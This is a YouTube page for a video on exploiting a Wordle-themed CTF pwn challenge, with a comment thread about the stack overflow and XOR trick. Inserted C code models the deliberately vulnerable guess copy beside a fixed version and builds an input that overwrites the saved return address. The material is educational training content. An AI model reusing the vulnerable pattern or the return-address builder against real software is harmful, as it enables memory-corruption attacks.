Hacking WORDLE ?! x64 "pwn" Binary Exploitation - RET2 WarGames Platform

33,396 views

John Hammond

A year ago

You can join me and play the WORDLE pwn challenge right in your web browser!
j-h.io/ret2wordle
Check out what RET2 Systems is up to: j-h.io/ret2
Help the channel grow with a Like, Comment, & Subscribe!
❤️ Support ➡ j-h.io/patreon ↔ j-h.io/paypal ↔ j-h.io/buymeacoffee
Check out the affiliates below for more free or discounted learning!
🖥️ Zero-Point Security ➡ Certified Red Team Operator j-h.io/crto
💻Zero-Point Security ➡ C2 Development with C# j-h.io/c2dev
🐜Zero2Automated ➡ Ultimate Malware Reverse Engineering j-h.io/zero2auto
🐜Zero2Automated ➡ MISP & Malware Sandbox j-h.io/zero2auto-sandbox
⛳Point3 ESCALATE ➡ Top-Notch Capture the Flag Training j-h.io/escalate
👨🏻‍💻7aSecurity ➡ Hacking Courses & Pentesting j-h.io/7asecurity
📗Humble Bundle ➡ j-h.io/humblebundle
🐶Snyk ➡ j-h.io/snyk
🤹‍♀️SkillShare ➡ j-h.io/skillshare
🌎Follow me! ➡ j-h.io/discord ↔ j-h.io/twitter ↔ j-h.io/linkedin ↔ j-h.io/instagram ↔ j-h.io/tiktok
📧Contact me! (I may be very slow to respond or completely unable to)
🤝Sponsorship Inquiries ➡ j-h.io/sponsorship
🚩 CTF Hosting Requests ➡ j-h.io/ctf
🎤 Speaking Requests ➡ j-h.io/speaking
💥 Malware Submission ➡ j-h.io/malware
❓ Everything Else ➡ j-h.io/etc

Comments: 53
@matteo1429 · a year ago
There are no "skip this part" parts in this great video: every given minute is useful, fun and help to understand and develop a quick thinking scheme.. I enjoyed it from beginning to the end, thanks!!
@austinchandler2629 · a year ago
This has become one of my favorite channels over the last couple of months and I feel difficult concepts have been explained very well by John. I would like to extend my gratitude by teaching you how to play Wordle. Don't double guess letters John.
@natornayce2790 · a year ago
Thanks John, always great content you put out. Although sometimes I have no idea what's going on, I'm still learning and you're such an inspiration.
@jruok · a year ago
John's got great eyebrows, they're naturally arched. Anyway, I'm a new follower (and new to this field) and am glad I found this channel. He's so smart. Keep up the good work!
@HopliteSecurity · a year ago
Nicely done. John Hammond is on fire with this one. I love your mug by the way - keep up the amazing work!
@adamkadaban · a year ago
love the pwn content can't wait for more 😌
@levisaxe2075 · a year ago
This was a real nice walk through. The 18 and disas for the function was all I needed at that point. Thanks, it would have taken me forever to figure it out to that point.
@levisaxe2075 · a year ago
Just finished the video and realized I sent the winning characters in a different format than you and got the shell 😆
@Sevicify · a year ago
Great video. I paused the video around 25 minutes when I decided I wanted to try the challenge myself. It ended up taking me like 30-40 minutes to beat it, but I did have that head start from what I had seen in the video prior with the overrun when copying to the state words array, though I somehow missed the game over flag being set inside an "else if", so I wasted a bit of time debugging trying to figure out why that wasn't breaking the main loop. Still, despite the head start, it was a fun little challenge figuring out the rest.

For the return address I went an easier route of looking at the stack framing at the start of the main function, knowing the address will be stored on top of the stack. Here we see RBP is pushed onto the stack and RSP is moved into RBP, meaning RBP+8 points to the return address. From here it was a matter of figuring out where the state structure was stored, which was easy looking at the attempts variable stored at RBP-30, which puts the words array at RBP-2E. So with this I could determine the words array came 54 bytes before and that the return address starts at the last byte of the 11th guess. After figuring this out I did a double check by dumping the registers and memory in the debugger after breaking at the end of the function.
@masterlanz1038 · a year ago
Hey John, nice vid! I just have a question: how do you know about these wargames? There are many resources, but staying updated... I feel I miss so much!
@Incognito1786 · a year ago
Before watching John do binary exploitation, I understood none of it. Now, after watching several of John's videos on binary exploitation, I understand....absolutely none of it. But it's fun to watch him try to figure things out.
@johanngambolputty5351 · a year ago
Wow, I think this is probably the first time I actually fully followed one of these (with some rewinding), probably because I've only recently started looking at structs since I've started learning OpenCL (and at the same time trying to make sense of the buffers being exchanged from GPU into Python or C++). I'm not really into security/hacking, I just seem to enjoy trying to make sense of bits of these videos. So let me get this straight:
- The loop only breaks when the right solution is given, or on (exactly) the sixth guess (but not on 7th+), but we want to stay in it (because with every guess we start writing further into the stack).
- Because of this, we want to skip the check for the sixth guess by giving the right solution; at the same time this marks the game as solved, but we can overwrite this. This is because we copy the full buffer over the words grid and not just the first five characters (though for future writes, only the first five characters matter as we will re-overwrite the rest on future passes). This kinda happens automatically, because a newline always gets appended to your input and this always gets replaced by 0?
- Guess 7 is crucial, because trying to index into state.words actually starts to write beyond it (we were writing beyond before, but now everything we write is beyond), in this case state.words[7] which begins at the solved variable. Here if the first character of the word input is anything other than 0, state.solved evaluates as true in the while check, with the caveat that after we write the whole buffer onto the stack, we then encrypt its first five bytes. So actually, if the first character of the guess encrypts to anything other than zero on this guess, the loop breaks. The encryption is actually important here, because it's how you sneak your null byte past the strlen check (otherwise you have a zero length string).
- After this, we just keep writing until we touch memory the process doesn't own and we get a segfault? But the stuff we want to get to is before that, so here begins the game of trying to overwrite main's return pointer?
- John ends up having to write data that encrypts to a target address, but given that we actually write 16 chars every time and only the first 5 get encrypted, would it be simpler to try to overwrite RIP one or two guesses earlier by entering something like "GUESS " (I should probably just try it myself :) )

edit: idea doesn't work, each line gets sent as separate input (can't have in the middle :( )
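To make the sequence in the comment above concrete, here is an added C model of the flaw it describes. This is my reconstruction from the thread, not the RET2 challenge source: a stack struct with `attempts`, a 6x5 `words` grid and a `solved` flag laid out the way the offsets quoted in the thread suggest (attempts at rbp-0x30, words at rbp-0x2e), a copy routine that writes the whole 16-byte input line at `words[attempts]` and XORs the first five bytes with 0x29, and a bounded version beside it. The field names, the `tail` padding that keeps the stray writes inside one C object, and the exact loop condition are assumptions.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define MAX_GUESSES 6
#define WORD_LEN 5
#define INPUT_LEN 16
#define ENCRYPTION_BYTE 0x29   /* the xor immediate seen in encrypt_word, per the thread */

/* Assumed game state (reconstruction, not the challenge source): `attempts`
 * first, the words grid two bytes in, `solved` straight after the grid.
 * `tail` only exists to keep the out-of-bounds writes below inside one C object. */
struct state {
    uint16_t attempts;                 /* offset 0 */
    char words[MAX_GUESSES][WORD_LEN]; /* offsets 2..31 */
    uint8_t solved;                    /* offset 32: where guess 7 lands */
    uint8_t tail[15];
};

/* Loop condition as the comment describes it: stop when solved, or on
 * exactly the sixth attempt, so past 6 the loop never ends on its own. */
static bool game_continues(const struct state *st) {
    return !st->solved && st->attempts != MAX_GUESSES;
}

static bool continues_at(uint16_t attempts, uint8_t solved) {
    struct state st = { .attempts = attempts, .solved = solved };
    return game_continues(&st);
}

/* Vulnerable: the guess index is never bounded and the whole 16-byte input
 * line is copied into the grid before the first WORD_LEN bytes are XORed. */
static void store_guess_vuln(struct state *st, const unsigned char in[INPUT_LEN]) {
    unsigned char *dst = (unsigned char *)st + offsetof(struct state, words)
                       + (size_t)st->attempts * WORD_LEN;
    memcpy(dst, in, INPUT_LEN);
    for (int i = 0; i < WORD_LEN; i++)
        dst[i] ^= ENCRYPTION_BYTE;      /* in-place "encryption" of the stored word */
    st->attempts++;
}

/* Hardened: refuse indices past the grid and copy only one word's worth. */
static bool store_guess_safe(struct state *st, const unsigned char in[INPUT_LEN]) {
    if (st->attempts >= MAX_GUESSES)
        return false;
    memcpy(st->words[st->attempts], in, WORD_LEN);
    for (int i = 0; i < WORD_LEN; i++)
        st->words[st->attempts][i] ^= ENCRYPTION_BYTE;
    st->attempts++;
    return true;
}

/* Feed `n` copies of one line through the vulnerable path and report the
 * `solved` byte afterwards. Byte 5 of the line is 0, standing in for the
 * newline the game turns into NUL; that is what keeps `solved` clear on
 * guess 6, and guess 7 then writes `first ^ ENCRYPTION_BYTE` over it. */
static uint8_t solved_after_vuln(int n, unsigned char first) {
    struct state st;
    memset(&st, 0, sizeof st);
    unsigned char line[INPUT_LEN];
    memset(line, 'A', INPUT_LEN);
    line[0] = first;
    line[WORD_LEN] = 0;
    for (int i = 0; i < n; i++)
        store_guess_vuln(&st, line);
    return st.solved;
}

/* Same drive through the hardened path: returns how many guesses were
 * accepted, or -1 if the flag was ever touched by the copy. */
static int accepted_safe(int n) {
    struct state st;
    memset(&st, 0, sizeof st);
    unsigned char line[INPUT_LEN];
    memset(line, 'A', INPUT_LEN);
    int ok = 0;
    for (int i = 0; i < n; i++)
        ok += store_guess_safe(&st, line);
    return st.solved == 0 ? ok : -1;
}
```

With `attempts == 6` the write lands on `solved`; a first byte of 0x29 XORs to zero, which is the trick the comment refers to, while any other first byte ends the loop. The hardened copy fixes both halves of the bug: it rejects an index past the grid and copies only WORD_LEN bytes, so a line's tail can no longer reach the flag either.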
@jazzpizazz2692 · a year ago
Great video John! The RET2 wargames look really interesting! Too bad they ask $999 for 3 months of access. This is around the same amount of money I paid a few years ago to get OSCP certified :')
@jordanmusleh6305 · a year ago
Good morning Mr Hammond, need a bit of help: so in order to play that game do we need a virtual machine?
@booruledie3052 · a year ago
Great video!
@d0m186 · a year ago
It would have been much easier to just send the xor encrypted bytes instead of sending A's etc. and trying to figure out what the resulting rip bytes correspond to. But aside from that very interesting video!
@Sevicify · a year ago
As the return address is just stored on the stack, an easier way is figuring out the original stack pointer when the function is called and calculating beforehand the distance at which the state structure is located. For the stack pointer you just need to look at the start of the function, where RBP is pushed onto the stack and RSP is moved into RBP and isn't changed throughout the function, so this means RBP+8 points to the original top of the stack, which just so happens to be the return address used by ret at the end. Looking through the function you can then determine state is stored at RBP-30 and specifically the words array at RBP-2E, so that basically means there's 54 bytes from the start of the words array to the return address, which comes to starting at the last byte of the 11th guess.
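The offset arithmetic in the two comments by @Sevicify, together with @d0m186's point about sending pre-XORed bytes, as one added C example (mine, not from the video or RET2): it takes the frame offsets quoted above (grid at rbp-0x2e, return address at rbp+8), derives which guess and which byte first overlap the return address, and builds the line for that guess so that the bytes land correctly after the binary's in-place XOR with 0x29. Assumptions beyond the thread: only the first five bytes of each line are XORed, the trailing newline is stored as 0x00, and a 0x00 or 0x0a byte cannot be sent in the line; the target address 0x401122 is made up for the check at the end.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define WORD_LEN 5
#define INPUT_LEN 16
#define ENCRYPTION_BYTE 0x29

/* Frame offsets quoted in the thread: words grid at rbp-0x2e, saved return
 * address at rbp+8 (rbp pushed, then rsp copied into rbp, never moved). */
#define WORDS_OFF (-0x2e)
#define RET_OFF   8

/* Bytes from words[0][0] to the first byte of the return address. */
static int ret_distance(void) { return RET_OFF - WORDS_OFF; }

/* 1-based guess whose slot holds that byte, and the byte's index within the
 * slot; each guess advances the write cursor by WORD_LEN. */
static int ret_guess_number(void) { return ret_distance() / WORD_LEN + 1; }
static int ret_byte_in_guess(void) { return ret_distance() % WORD_LEN; }

/* Build the line for that guess so the low `nbytes` bytes of `target` end up
 * on the return address. Positions below WORD_LEN are XORed by the binary
 * after the copy, so they get the XOR pre-image (XOR is its own inverse);
 * later positions land as sent. Returns the line length, or -1 when a needed
 * byte is unsendable: 0x00 fails the strlen check and 0x0a ends the line
 * early (assumed input handling). The newline the game stores as 0x00 then
 * supplies one free zero byte right after the last byte placed here. */
static int build_ret_line(uint64_t target, int nbytes, unsigned char out[INPUT_LEN]) {
    int first = ret_byte_in_guess();
    if (nbytes < 1 || nbytes > 8 || first + nbytes > INPUT_LEN)
        return -1;
    memset(out, 'A', INPUT_LEN);                 /* filler ahead of the address */
    for (int i = 0; i < nbytes; i++) {
        int pos = first + i;
        unsigned char want = (unsigned char)(target >> (8 * i));
        unsigned char send = pos < WORD_LEN ? (unsigned char)(want ^ ENCRYPTION_BYTE) : want;
        if (send == 0x00 || send == '\n')
            return -1;
        out[pos] = send;
    }
    return first + nbytes;
}

/* What the binary stores for a line we send (the reverse transform), used to
 * confirm the construction round-trips to the intended value. */
static uint64_t stored_value(const unsigned char line[INPUT_LEN], int nbytes) {
    int first = ret_byte_in_guess();
    uint64_t v = 0;
    for (int i = 0; i < nbytes; i++) {
        int pos = first + i;
        unsigned char b = pos < WORD_LEN ? (unsigned char)(line[pos] ^ ENCRYPTION_BYTE) : line[pos];
        v |= (uint64_t)b << (8 * i);
    }
    return v;
}

/* Returns the value that would land on the return address, or UINT64_MAX if
 * the target cannot be expressed with sendable bytes. */
static uint64_t roundtrip(uint64_t target, int nbytes) {
    unsigned char line[INPUT_LEN];
    if (build_ret_line(target, nbytes, line) < 0)
        return UINT64_MAX;
    return stored_value(line, nbytes);
}
```

Only byte 4 of the 11th guess sits inside the XORed window, so it is the one byte that needs a pre-image; the rest of the address goes out raw. The two failure cases matter in practice: a target byte equal to the XOR key would need 0x00 as its pre-image, and a raw 0x0a ends the line, so such an address needs a different gadget or a different alignment of guesses.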
@johanngambolputty5351 · a year ago
Why do we observe hex(char ^ 0x27 +2) where we write char? (e.g. 0x68 for "A")?
@nocturne5151 · a year ago
Hello, regarding understanding the debugger: how does he know to look at the rip line?
@logiciananimal · a year ago
This is great - a starting point for learning pwntools!
@BioHack · a year ago
Great video 😎
@sammo7877 · a year ago
almost Shakespeare worthy ;)
@list1726 · a year ago
Thanks for making this video
@urits3719 · a year ago
What debugger is being used here?
@eyephpmyadmin6988 · a year ago
How did you know the xor 0x26 was the encryption byte? How did you find that link between the source code and the disassembler?
@LilithWolf_ · a year ago
The source code was iterating over the word characters and XOR'ing the characters with ENCRYPTION_BYTE (the ^= being the XOR and assign operator), XOR happens to be a direct CPU instruction, so we know we are looking for an XOR instruction in the assembly. Since the function only does that one thing (iterate over the characters and XOR with a special value), then we know that whatever XOR instruction we find, it HAS to be the specific XOR instruction from the `input[i] ^= ENCRYPTION_BYTE`. We see that the XOR instruction takes two operands, the register ECX and the literal immediate, 0x29. Compilers will optimise code as much as possible, so rather than it putting the ENCRYPTION_BYTE somewhere in memory and making it load it out every time its needed, it will instead (because ENCRYPTION_BYTE is unchanged throughout the program) encode it directly into the assembly instruction. Thus the 1 literal immediate value _has_ to be the encryption byte.
@jimo8486 · a year ago
It's best to watch it fully and see how you fixed the issue so you know what went wrong.
@virous360 · a year ago
hi John
@pranjalaswal8300 · a year ago
He is going for OSEE 😎
@dumbidiot1119 · a year ago
I'm not gonna pretend like I know anything about binary exploitation or anything hackery in general, but before I get to the solution, I think maybe if you type a specific string into the input it gets XORed into a different, more dangerous byte that will screw with the code or something.
@dumbidiot1119 · a year ago
I was kinda right no way
@aaaron19 · a year ago
50:13 omg I died laughing. So relatable
@antimatter6728 · a year ago
Technically speaking, is this a heap overflow? Because you overflow the variable in the object?
@BioHack · a year ago
Nope, the struct wasn't allocated on the heap but on the stack.
@guilherme5094 · a year ago
👍!
@frydegz · a year ago
shmoocon 👀
@harshitgarg8848 · a year ago
so much. Can’t wait to start making soft.
@jenycek2222 · a year ago
00:23 2 many secrets RET2 systems I want to believe took me like 5 mins btw...
@mirnaoliviamelendrezruiz2450 · a year ago
Can we all appreciate the fact that he destroyed a
@PatrickScheich · a year ago
Where is the point where the "\x29" comes up? I rewatched, but John suddenly pulls the "\x29" out of thin air.
@MizardXYT · a year ago
It was the ENCRYPTION_BYTE value, which he got from disassembling encrypt_word at 18:31. The xor line corresponds to the ^ operator, which has a 0x29 value in the disassembly.
@PatrickScheich · a year ago
@@MizardXYT Thanks
@M_IZAN · a year ago
Love From Muslim 💜💜💜💜
@lunchZA · a year ago
6:39 the Wordle game has a bug: there is no way the second E in CREED is yellow when the solution is CYBER.
@hozehd8246 · a year ago
3 comments?
@daudameen1916 · a year ago
43:05
@thatcrockpot1530 · a year ago
Nice vid, but binexp in a browser is haram.
@bfx8185 · a year ago
hmmm really?
@alext5497 · a year ago
It's in local storage, Mr Hacker.
@madorplayeryt · a year ago
Could you do it in Russian? Kazakh would be even better, so that it's understandable.
@flrn84791 · a year ago
Such a sloppy script 🤣
@flrn84791 · a year ago
All it would have taken is a xor function...